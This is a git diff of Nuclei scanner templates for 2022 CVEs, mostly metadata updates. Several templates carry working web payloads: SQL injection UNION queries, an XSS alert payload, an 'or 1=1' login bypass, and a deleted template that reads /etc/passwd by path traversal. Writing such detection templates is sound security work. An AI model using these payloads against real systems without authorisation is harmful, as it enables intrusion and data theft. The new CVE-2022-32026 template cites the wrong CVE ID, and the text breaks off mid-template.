+# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31978.yaml b/nuclei-templates/CVE-2022/CVE-2022-31978.yaml index e71114fefa..7130952dc8 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31978.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31978.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31978 cwe-id: CWE-89 - epss-score: 0.01029 - epss-percentile: 0.82159 + epss-score: 0.02031 + epss-percentile: 0.88685 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 4a0a00473045022100e1af9247f70e01a6a9426c0799b108204348a72bede0c3f365524ced84a27254022060091c3aad3b5f0491c2bc1ded94fa56451a0dd5105b5bdeee610faedc7ec1e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31980.yaml b/nuclei-templates/CVE-2022/CVE-2022-31980.yaml index eeb64a488f..3c9c973c05 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31980.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31980.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31980 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01429 + epss-percentile: 0.85199 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100bff477ac6051906a524ff02263e50769db9293009709ab453e3afa2302671a7a022030b2031e32382f958d4204838d5a4e1e48edad4070309ff3e17ba2c7941d9de5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3341f65cb26f4caef4623c562e9c774a42d72d1b51a42bb411f7ff44a7bf95d022100b2ee810fbeb3fca59b9907d6cdfe24246501706f3d77fa3b5e7526e32f8fc395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31981.yaml b/nuclei-templates/CVE-2022/CVE-2022-31981.yaml index 08a5c619e3..63697be4ed 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31981.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31981.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100c5abdb3bcfa59cd35b6a6e6dadd702733ef2fc15b92c37c0dcf1973ac64665b8022032502273bbe23c7bc8a62818e8eaa1b26d3068f11b21eb44ee70ccbf766fff2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31982.yaml b/nuclei-templates/CVE-2022/CVE-2022-31982.yaml index 0284d3b257..ec3c541336 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31982.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31982.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31982 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100e33945ad8e8a8ff4c0ae77d6eb069afb73e05267c12df56b4225e6fcf2815cab022014765f41dbb300e9db882cadc42348d7b8793373d885344750279d7c8df8f5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31983.yaml b/nuclei-templates/CVE-2022/CVE-2022-31983.yaml index 080568e291..d7d9c8d698 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31983.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31983.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.00834 + epss-percentile: 0.80157 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project http: - method: GET @@ -40,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100c5785b6fbe98581473982974804d6759501979d5d9b11be1190f6843b302daf2022035a9ed8ae42b4cebdba6dc775e2075a5ca4e627e89bd9c18030290a43aae6669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-31984.yaml b/nuclei-templates/CVE-2022/CVE-2022-31984.yaml index 33bbbb44e6..301514c200 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-31984.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-31984.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.77425 + epss-score: 0.01426 + epss-percentile: 0.8625 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting + tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project variables: num: '999999999' @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008f86a8176fdf2a60ed5c25008112a050525dabfad97e95d2bf905811018e864502205f0cc1f2f76f7502cbe77de4f02f3014d14872e35a9a2a9f29b4159d3fcbc1ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml index 3fff028ab9..b1faf475d6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml @@ -1,42 +1,29 @@ id: CVE-2022-32015 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: complete_online_job_search_system_project - product: complete_online_job_search_system - tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project + verified: "true" + tags: cve,cve2022,sqli,jobsearch variables: num: "999999999" - -http: +requests: - method: GET path: - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml index b9819f6aa3..1fa8cbf9bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml @@ -1,11 +1,10 @@ id: CVE-2022-32018 - info: - name: Complete Online Job Search System 1.0 - SQL Injection + name: Complete Online Job Search System v1.0 - SQL Injection author: arafatansari severity: high description: | - Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 @@ -17,19 +16,14 @@ info: metadata: verified: "true" tags: cve,cve2022,sqli - variables: num: "999999999" - requests: - method: GET path: - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" - matchers: - type: word part: body words: - '{{md5({{num}})}}' - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml index 702a2df8ed..644f0f8df2 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml @@ -1,11 +1,10 @@ id: CVE-2022-32024 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32024 @@ -19,10 +18,8 @@ info: shodan-query: http.html:"Car Rental Management System" verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated - variables: num: "999999999" - requests: - raw: - | @@ -31,11 +28,9 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true cookie-reuse: true matchers-condition: and @@ -44,9 +39,6 @@ requests: part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml new file mode 100644 index 0000000000..87d30308b6 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-32026 +info: + name: Car Rental Management System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 + Host: {{Hostname}} + skip-variables-check: true + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml index b598d48ce0..6afb4dca59 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32028.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32028.yaml @@ -1,11 +1,10 @@ id: CVE-2022-32028 - info: - name: Car Rental Management System 1.0 - SQL Injection + name: Car Rental Management System v1.0 - SQL Injection author: arafatansari severity: high description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 @@ -19,10 +18,8 @@ info: shodan-query: http.html:"Car Rental Management System" verified: "true" tags: cve,cve2022,carrental,cms,sqli,authenticated - variables: num: "999999999" - requests: - raw: - | @@ -31,13 +28,11 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 Host: {{Hostname}} - skip-variables-check: true - host-redirects: true + redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and @@ -46,9 +41,6 @@ requests: part: body words: - '{{md5({{num}})}}' - - type: status status: - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32094.yaml b/nuclei-templates/CVE-2022/CVE-2022-32094.yaml index f32ecc9e57..43fd7e005e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32094.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32094.yaml @@ -6,20 +6,32 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/ - https://nvd.nist.gov/vuln/detail/CVE-2022-32094 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 + epss-score: 0.01192 + epss-percentile: 0.83651 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: hospital_management_system_project + product: hospital_management_system shodan-query: http.html:"Hospital Management System" - verified: "true" - tags: cve,cve2022,hms,cms,sqli,auth-bypass + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project -requests: +http: - raw: - | POST /hms/doctor/ HTTP/1.1 @@ -30,7 +42,7 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -43,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/26 +# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32195.yaml b/nuclei-templates/CVE-2022/CVE-2022-32195.yaml index a8cef00f12..a06e93bdc7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32195.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32195.yaml @@ -6,22 +6,34 @@ info: severity: medium description: | Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. reference: - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408 - https://github.com/edx - https://nvd.nist.gov/vuln/detail/CVE-2022-32195 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32195 cwe-id: CWE-79 + epss-score: 0.00112 + epss-percentile: 0.43735 + cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: - comment: Hover the cursor on the redirect link + verified: true + max-request: 1 + vendor: edx + product: open_edx shodan-query: http.html:"Open edX" - verified: "true" - tags: cve,cve2022,openedx,xss + comment: Hover the cursor on the redirect link + tags: cve,cve2022,openedx,xss,edx -requests: +http: - method: GET path: - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)' @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml deleted file mode 100644 index 45a9d0ff2e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-32409 - -info: - name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion - author: pikpikcu - severity: critical - description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/CVE-2022-3242.yaml b/nuclei-templates/CVE-2022/CVE-2022-3242.yaml index d2a86082df..ab1b488535 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3242.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3242.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 - epss-score: 0.02392 - epss-percentile: 0.88709 + epss-score: 0.024 + epss-percentile: 0.8882 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,xss,cve,cve2023,microweber + tags: cve,cve2022,huntr,xss,microweber http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")' condition: and -# digest: 4a0a0047304502205a6b07b307697dc983f6c5b001a2c4ba4cbe962ba71d8aa644f363f561d73e47022100a60f0abf50eff9552e08371533f3c0364e214c92d0e6938dc918d776f54a633f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32429.yaml b/nuclei-templates/CVE-2022/CVE-2022-32429.yaml index 8590204655..f946f1268c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-32429.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-32429.yaml @@ -1,26 +1,38 @@ id: CVE-2022-32429 info: - name: MSNSwitch Firmware MNT.2408 - Configuration Dump + name: MSNSwitch Firmware MNT.2408 - Authentication Bypass author: theabhinavgaur severity: critical description: | - The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device. + MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html - https://elifulkerson.com/CVE-2022-32429/ - https://nvd.nist.gov/vuln/detail/CVE-2022-32429 + - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 + epss-score: 0.15342 + epss-percentile: 0.95742 + cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: megatech + product: msnswitch_firmware shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 - verified: "true" - tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch + tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh" @@ -42,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32430.yaml b/nuclei-templates/CVE-2022/CVE-2022-32430.yaml new file mode 100644 index 0000000000..98550c804a --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32430.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-32430 + +info: + name: Lin CMS Spring Boot - Default JWT Token + author: DhiyaneshDK + severity: high + description: | + An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application. + reference: + - https://github.com/TaleLin/lin-cms-spring-boot + - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32430 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-32430 + epss-score: 0.00227 + epss-percentile: 0.60316 + cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: talelin + product: lin-cms-spring-boot + fofa-query: body="心上无垢,林间有风" + tags: 